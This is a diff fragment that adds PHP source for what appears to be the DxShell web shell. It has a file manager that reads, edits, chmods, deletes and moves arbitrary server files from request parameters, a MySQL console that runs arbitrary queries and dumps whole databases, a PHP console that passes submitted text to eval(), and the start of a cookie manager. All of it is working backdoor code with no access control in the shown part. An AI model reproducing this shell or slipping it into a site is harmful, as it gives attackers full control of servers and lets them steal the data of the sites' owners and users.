+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{	if (empty($_GET['dxfile']))
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{		if (isset($_GET['dx_ok']))
+			{		if ($_GET['dx_ok']=='Yes')
+			{			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Search
+########
+if ($_GET['dxmode']=='SQLS')
+	{
+	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	if (isset($_POST['dxsqlsearch']['txt']))
+		if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" '
+				.(  (isset($_POST['dxsqlsearch']['tables']))?   ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'')   :'SELECTED'  ).'>'
+				.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">';
+	print "\n".'<br>';
+	foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad)
+		print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" '
+			.(  (isset($_POST['dxsqlsearch']['mode']))?   (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'')   :(($cur_rad=='Any')?'CHECKED':'')  )
+			.' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;';
+	print "\n".'<div align=right><input type=submit value="Search..." class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+
+	if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>');
+
+	if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected'));
+
+	if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt']));
+		else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']);
+
+
+	$GLOBALFOUND=0;
+	foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE)
+		{		$Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE ';
+		$Q_ARR=array();
+		DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true);   for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0];
+		foreach ($COLS as $CUR_COL)
+			{			if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact')))
+				{				for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++)
+				$Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"';
+				}
+				else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0];
+
+			if ($_POST['dxsqlsearch']['mode']=='each')
+				{				$Q_ARR_EXACT[]=implode(' AND ', $Q_ARR);
+				$Q_ARR=array();
+				}
+			}
+		if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';';
+		if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );';
+		if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );';
+
+		/* $Q is ready */
+
+		if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0)
+			{
+			$GLOBALFOUND+=$num;			print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' :</caption>';
+			print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>';
+			for ($l=0;$l<count($FETCHED);$l++)
+				{
+				print "\n\t".'<tr>';
+				for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>';
+				print '</tr>';
+				}
+			print "\n".'</table><br>';
+			}
+		}
+	print "\n".'<br>Total: '.$GLOBALFOUND.' matches';
+
+	print "\n".'</td></tr></table>';
+	}
+
+########
+########   SQL Dump
+########
+if ($_GET['dxmode']=='SQLD')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d']))	die(DxError('SQL server/login/password/database are not set'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>';
+	print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+	for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+	asort($TABLES);
+
+	print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>';
+	for ($i=0;$i<count($TABLES);$i++)
+		{
+		DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);
+		if ($TRowCnt[0][0]>0)
+			print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>';
+		}
+	print "\n\t".'</SELECT>';
+	print "\n".'</td><td  width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):';
+	print "\n".'<input type=text name="dxsql_q" style="width:100%;">';
+	print "\n".'<br>';
+	print "\n".'<div align=right>'
+		.'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10)
+		.'<input type=submit value="Dump!" class=submit style="width:100pt;"></div>';
+	print "\n".'</form>';
+	}
+
+		###################################
+
+########
+########   PHP Console
+########
+if ($_GET['dxmode']=='PHP')
+	{
+	if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval'];
+
+	print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">';
+	$PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']);
+	for ($i=0; $i<count($PRESETS);$i++)
+		print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>'
+						.(  ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3)  );
+	print "\n\n".'</td></tr></table><br><br>';
+
+	if (isset($_POST['dxval']))
+		if (strpos($_POST['dxval'], 'dxpreset__')===0)
+			{			$_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__'));
+			if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset'));
+			$_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']];
+			}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>';
+	print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>';
+	print "\n".'</form>';
+	if (isset($_POST['dxval']))
+		{		print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n";
+		eval($_POST['dxval']);
+		print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>';
+		}
+	}
+
+		###################################
+
+########
+########  Cookies Maintenance
+########
+if ($_GET['dxmode']=='COOK')
+	{
+	if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =(');	print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' cookie'.(($CNT==1)?'':'s');
+
+	print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>';
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
